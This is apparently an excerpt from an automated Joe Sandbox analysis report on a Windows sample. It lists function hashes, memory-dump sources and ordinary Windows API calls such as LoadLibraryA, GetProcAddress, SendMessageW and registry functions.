                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                  • Opcode ID: cee83ba62fa4ea24efa54aea1cb023ba70c31f8387afc3c8984a542cbfb51868
                                                                                                                  • Instruction ID: 290c2ea7b53dfdde05b7b52bc32c2efa39cf7114369e637304d455b7e8f0bd2a
                                                                                                                  • Opcode Fuzzy Hash: cee83ba62fa4ea24efa54aea1cb023ba70c31f8387afc3c8984a542cbfb51868
                                                                                                                  • Instruction Fuzzy Hash: 1D21C532610118BFDF118F55EC85EBF3BAAEF89764F018128F954B71A1C6719C5197A0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E4A46D
                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E4A482
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E4A48F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: c787f4e79ab2c24e18f2fe8286f85c5b3550e27cd96716e3f6d5357aa1af413a
                                                                                                                  • Instruction ID: 3aa824c396b265e35f8c97084895f9c0bff17548e2d883682c00452b6083ef3a
                                                                                                                  • Opcode Fuzzy Hash: c787f4e79ab2c24e18f2fe8286f85c5b3550e27cd96716e3f6d5357aa1af413a
                                                                                                                  • Instruction Fuzzy Hash: 1711E771240208BEEF205F65DC49FAB3B69EF89768F054128FA55B60D1D2B2E811C724
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00E022A1
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E022A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                  • Opcode ID: 08e0833cce0fa09fe45699ff0b99c7aff0c0ac4f059881a9d77ff6f821d9d8e4
                                                                                                                  • Instruction ID: 9c0608d058ba7819c22c817963e5b8a28544e70e0f3414af6d7ef4e894e5c5c7
                                                                                                                  • Opcode Fuzzy Hash: 08e0833cce0fa09fe45699ff0b99c7aff0c0ac4f059881a9d77ff6f821d9d8e4
                                                                                                                  • Instruction Fuzzy Hash: AEE01A74A99300AFDB905FB3EC4DB5536A9AB1A746F505025F202F50F0CBF55089DF05
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E02276), ref: 00E02376
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E0237D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                  • Opcode ID: 6a353bd264be592e567f5e0adfe925540f8bd954e8d07eb83f44374d8df36b88
                                                                                                                  • Instruction ID: c7fb66e3c9e98bd0db0679edddc5646e1153937ffb47c35f0b697294c29db418
                                                                                                                  • Opcode Fuzzy Hash: 6a353bd264be592e567f5e0adfe925540f8bd954e8d07eb83f44374d8df36b88
                                                                                                                  • Instruction Fuzzy Hash: BEE0B6B0B8A301AFDB205F63FD0DB553AA5BB29756F501425F20AF20B0CBBA6458CA14
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                  • Opcode ID: 14bb0d8c69a897c6c171d2a1fd3e74afd835a161af9300e4e5c4e93de6b1d53b
                                                                                                                  • Instruction ID: 3c8318efb7205b22a71af6cfdfa08d57632cf68f988ce1b3958f1c31986ece0c
                                                                                                                  • Opcode Fuzzy Hash: 14bb0d8c69a897c6c171d2a1fd3e74afd835a161af9300e4e5c4e93de6b1d53b
                                                                                                                  • Instruction Fuzzy Hash: 96E012B180461CDBCB119790DD05DFAB3BDA704742F5869E2FD06B1050D6759B8CAB23
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00DFE014,75920AE0,00DFDEF1,00E7DC38,?,?), ref: 00DFE02C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DFE03E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                  • Opcode ID: ea9a07e07b01b70d5fdf5d3ea982bec7b48b150499b85307dcaf00776c39e802
                                                                                                                  • Instruction ID: f31f06e8005c26e3ace12a7d9212334779018e358074af314a0459e5ce08755b
                                                                                                                  • Opcode Fuzzy Hash: ea9a07e07b01b70d5fdf5d3ea982bec7b48b150499b85307dcaf00776c39e802
                                                                                                                  • Instruction Fuzzy Hash: 5CD0A770906712EFCF324F62FC4862377D4AB01310F1D851DE581F2160DBF4C8848660
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00DE42EC,?,00DE42AA,?), ref: 00DE4304
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DE4316
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                  • Opcode ID: 05e40d500d6d77cbd6396ceb540720bfcf5ef1b7892f4fbc6526d74eadef4a3e
                                                                                                                  • Instruction ID: 0a10454fa42c7b8c4b2ac82cb2ccede517eb18542adcff4754edf1d048f38ab5
                                                                                                                  • Opcode Fuzzy Hash: 05e40d500d6d77cbd6396ceb540720bfcf5ef1b7892f4fbc6526d74eadef4a3e
                                                                                                                  • Instruction Fuzzy Hash: AFD0A734944712AFCB205F33FC0C60277D4AB06311B04441DE541F2264D7F0C8848620
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E421FB,?,00E423EF), ref: 00E42213
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00E42225
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                  • Opcode ID: 894b9a97d31e1025823aecf96c0d5277d9e3d53dacbcff13531e908e51db003c
                                                                                                                  • Instruction ID: 624f2784174529df4562a18d56eaf4e97b912f95c7f508f8a9f6f36738fe3c1e
                                                                                                                  • Opcode Fuzzy Hash: 894b9a97d31e1025823aecf96c0d5277d9e3d53dacbcff13531e908e51db003c
                                                                                                                  • Instruction Fuzzy Hash: 1FD0A7749047129FCB214F72FC0860277D5EB0A314B40641DF941F2160D7F0D884C660
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00DE41BB,00DE4341,?,00DE422F,?,00DE41BB,?,?,?,?,00DE39FE,?,00000001), ref: 00DE4359
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DE436B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                  • Opcode ID: 5f8b4c77202af623365fed3714398aa37f0ce05c66dd1c586b0988fcca184d22
                                                                                                                  • Instruction ID: 8dae4b426866a9bd9344182b277f18491d5c0fd02a10e1cc2d0fa2611a6cbbba
                                                                                                                  • Opcode Fuzzy Hash: 5f8b4c77202af623365fed3714398aa37f0ce05c66dd1c586b0988fcca184d22
                                                                                                                  • Instruction Fuzzy Hash: 39D0A730944712AFCB205F33FC0C60377D4AB11755B04851DE481F2250D7F0D8848630
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00E2052F,?,00E206D7), ref: 00E20572
                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E20584
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                  • Opcode ID: 8659d72151fae64d0b00aa1eb2d100894fe59dac4125928111f80287d7378e0a
                                                                                                                  • Instruction ID: ba321a9ab32b51f673adf6b6ce1695a2cc3eb2943ed47cdad68fffb2beac6167
                                                                                                                  • Opcode Fuzzy Hash: 8659d72151fae64d0b00aa1eb2d100894fe59dac4125928111f80287d7378e0a
                                                                                                                  • Instruction Fuzzy Hash: 0FD05E30A45322AECF209F22BC08A0277E8AF05314B50951DE945B2190D7F0C4C48A20
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00E2051D,?,00E205FE), ref: 00E20547
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E20559
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                  • Opcode ID: 9dfea1fe06722e0bd0b808a75dd16543460deafc940a3f4f66703d9c2f691407
                                                                                                                  • Instruction ID: b8350c22e6d9b779304b1bb097dd57e784367e7e15cfb24d674f496fbc6efb9b
                                                                                                                  • Opcode Fuzzy Hash: 9dfea1fe06722e0bd0b808a75dd16543460deafc940a3f4f66703d9c2f691407
                                                                                                                  • Instruction Fuzzy Hash: E3D0A730A45722AFCF308F22FC0860277E4AB01315B50D41DE446F2191D6F0C8848A50
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00E3ECBE,?,00E3EBBB), ref: 00E3ECD6
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E3ECE8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                  • Opcode ID: a97404a12dcc654a21ebdaf22458391c21906334870f65aa03e5d5426e43ad5a
                                                                                                                  • Instruction ID: 06899fba903f8e735b05c3c5d89ce11820c0803a3c06c8d523fa3cca17360f7a
                                                                                                                  • Opcode Fuzzy Hash: a97404a12dcc654a21ebdaf22458391c21906334870f65aa03e5d5426e43ad5a
                                                                                                                  • Instruction Fuzzy Hash: A5D05E70904723AFCF245B62AC48706BAE4AF01754F00A419E855B2290DAF0C885C710
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E3BAD3,00000001,00E3B6EE,?,00E7DC00), ref: 00E3BAEB
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E3BAFD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                  • Opcode ID: 7347f9b57851114590dc471484784c3faccc6c8803546e5e79d6fa4e30371b87
                                                                                                                  • Instruction ID: 749f111b5100abe58a36b8aa7f5aa028b745b1e1551de8a940d28e5a7165f670
                                                                                                                  • Opcode Fuzzy Hash: 7347f9b57851114590dc471484784c3faccc6c8803546e5e79d6fa4e30371b87
                                                                                                                  • Instruction Fuzzy Hash: 4FD05E70D047129FCB305F22BC48A12BAD4AB01354F005459E943B2154DBF0C884C610
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00E43BD1,?,00E43E06), ref: 00E43BE9
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E43BFB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 77dd6941db18c28ffdb52c142d96c5da8d6956b7fbc45f220e6338f5e124415d
• Instruction ID: 2322ab2784ccc868d73132d987926353c6c93b749fd666b717d3fc5af8a0fc38
• Opcode Fuzzy Hash: 77dd6941db18c28ffdb52c142d96c5da8d6956b7fbc45f220e6338f5e124415d
• Instruction Fuzzy Hash: 74D0A7F09047129FCB205FB2FC48A03FAF8AB02328B205429E445F2191D6F0C4848E20
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34d443f6f3c88a76d38561ad77c2b60b218b20fdf2299c94e12430adf8141bf4
• Instruction ID: 82d90c063f78f843208fb53c1513eb06189447afe50280c2f6c4b2d0d26db218
• Opcode Fuzzy Hash: 34d443f6f3c88a76d38561ad77c2b60b218b20fdf2299c94e12430adf8141bf4
• Instruction Fuzzy Hash: E3C15D75A0021AEFCB14CFA4C894AEEB7B5FF48704F105598E956EB252D730DE81DB90
APIs
• CoInitialize.OLE32(00000000), ref: 00E3AAB4
• CoUninitialize.COMBASE ref: 00E3AABF
  • Part of subcall function 00E20213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2027B
• VariantInit.OLEAUT32(?), ref: 00E3AACA
• VariantClear.OLEAUT32(?), ref: 00E3AD9D
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 7a28b1f7b5558bc3e3c7da67978f7e86df14428e2a2f95c43b55677644dd652d
